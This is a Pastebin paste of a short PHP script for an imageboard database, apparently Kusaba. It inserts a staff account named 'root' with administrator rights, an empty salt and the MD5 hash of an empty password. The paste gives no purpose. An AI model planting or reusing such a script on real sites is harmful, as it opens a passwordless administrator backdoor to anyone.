Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- include 'config.php';
- $tc_db->Execute("INSERT INTO `".KU_DBPREFIX."staff` (`username`, `password`, `salt`, `type`, `boards`, `addedon`, `lastactive`) VALUES ('root', 'd41d8cd98f00b204e9800998ecf8427e', '', '1', NULL, '0', '0');");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment